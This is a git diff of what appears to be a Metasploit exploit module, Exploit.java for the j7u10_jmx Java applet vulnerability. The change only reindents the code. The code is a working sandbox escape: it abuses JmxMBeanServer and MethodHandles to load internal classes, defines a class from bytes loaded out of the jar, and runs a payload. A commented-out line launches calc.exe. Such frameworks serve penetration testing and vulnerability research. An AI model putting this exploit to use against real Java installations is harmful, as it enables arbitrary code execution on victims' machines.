diff --git a/external/source/exploits/j7u10_jmx/Exploit.java b/external/source/exploits/j7u10_jmx/Exploit.java
index f35c8ee469..3402631a92 100755
--- a/external/source/exploits/j7u10_jmx/Exploit.java
+++ b/external/source/exploits/j7u10_jmx/Exploit.java
@@ -27,40 +27,40 @@ public class Exploit extends Applet { try { - ByteArrayOutputStream bos = new ByteArrayOutputStream(); - byte[] buffer = new byte[8192]; - int length; + ByteArrayOutputStream bos = new ByteArrayOutputStream(); + byte[] buffer = new byte[8192]; + int length; + + // read in the class file from the jar + InputStream is = getClass().getResourceAsStream("B.class"); + // and write it out to the byte array stream + while( ( length = is.read( buffer ) ) > 0 ) + bos.write( buffer, 0, length ); + // convert it to a simple byte array + buffer = bos.toByteArray(); + + JmxMBeanServerBuilder localJmxMBeanServerBuilder = new JmxMBeanServerBuilder(); + JmxMBeanServer localJmxMBeanServer = (JmxMBeanServer)localJmxMBeanServerBuilder.newMBeanServer("", null, null); + MBeanInstantiator localMBeanInstantiator = localJmxMBeanServer.getMBeanInstantiator(); + ClassLoader a = null; + Class localClass1 = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.Context", a); + Class localClass2 = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.GeneratedClassLoader", a); + MethodHandles.Lookup localLookup = MethodHandles.publicLookup(); + MethodType localMethodType1 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { MethodType.class }); + MethodHandle localMethodHandle1 = localLookup.findVirtual(MethodHandles.Lookup.class, "findConstructor", localMethodType1); + MethodType localMethodType2 = MethodType.methodType(Void.TYPE); + MethodHandle localMethodHandle2 = (MethodHandle)localMethodHandle1.invokeWithArguments(new Object[] { localLookup, localClass1, localMethodType2 }); + Object localObject1 = localMethodHandle2.invokeWithArguments(new Object[0]); + MethodType localMethodType3 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { String.class, MethodType.class }); + MethodHandle localMethodHandle3 = localLookup.findVirtual(MethodHandles.Lookup.class, "findVirtual", localMethodType3); + MethodType 
localMethodType4 = MethodType.methodType(localClass2, ClassLoader.class); + MethodHandle localMethodHandle4 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass1, "createClassLoader", localMethodType4 }); + Object localObject2 = localMethodHandle4.invokeWithArguments(new Object[] { localObject1, null }); + MethodType localMethodType5 = MethodType.methodType(Class.class, String.class, new Class[] { byte[].class }); + MethodHandle localMethodHandle5 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass2,"defineClass", localMethodType5 }); + Class localClass3 = (Class)localMethodHandle5.invokeWithArguments(new Object[] { localObject2, null, buffer }); + localClass3.newInstance(); - // read in the class file from the jar - InputStream is = getClass().getResourceAsStream("B.class"); - // and write it out to the byte array stream - while( ( length = is.read( buffer ) ) > 0 ) - bos.write( buffer, 0, length ); - // convert it to a simple byte array - buffer = bos.toByteArray(); - - JmxMBeanServerBuilder localJmxMBeanServerBuilder = new JmxMBeanServerBuilder(); - JmxMBeanServer localJmxMBeanServer = (JmxMBeanServer)localJmxMBeanServerBuilder.newMBeanServer("", null, null); - MBeanInstantiator localMBeanInstantiator = localJmxMBeanServer.getMBeanInstantiator(); - ClassLoader a = null; - Class localClass1 = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.Context", a); - Class localClass2 = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.GeneratedClassLoader", a); - MethodHandles.Lookup localLookup = MethodHandles.publicLookup(); - MethodType localMethodType1 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { MethodType.class }); - MethodHandle localMethodHandle1 = localLookup.findVirtual(MethodHandles.Lookup.class, "findConstructor", localMethodType1); - MethodType localMethodType2 = MethodType.methodType(Void.TYPE); - MethodHandle 
localMethodHandle2 = (MethodHandle)localMethodHandle1.invokeWithArguments(new Object[] { localLookup, localClass1, localMethodType2 }); - Object localObject1 = localMethodHandle2.invokeWithArguments(new Object[0]); - MethodType localMethodType3 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { String.class, MethodType.class }); - MethodHandle localMethodHandle3 = localLookup.findVirtual(MethodHandles.Lookup.class, "findVirtual", localMethodType3); - MethodType localMethodType4 = MethodType.methodType(localClass2, ClassLoader.class); - MethodHandle localMethodHandle4 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass1, "createClassLoader", localMethodType4 }); - Object localObject2 = localMethodHandle4.invokeWithArguments(new Object[] { localObject1, null }); - MethodType localMethodType5 = MethodType.methodType(Class.class, String.class, new Class[] { byte[].class }); - MethodHandle localMethodHandle5 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass2,"defineClass", localMethodType5 }); - Class localClass3 = (Class)localMethodHandle5.invokeWithArguments(new Object[] { localObject2, null, buffer }); - localClass3.newInstance(); - Payload.main(null); //Runtime.getRuntime().exec("calc.exe"); }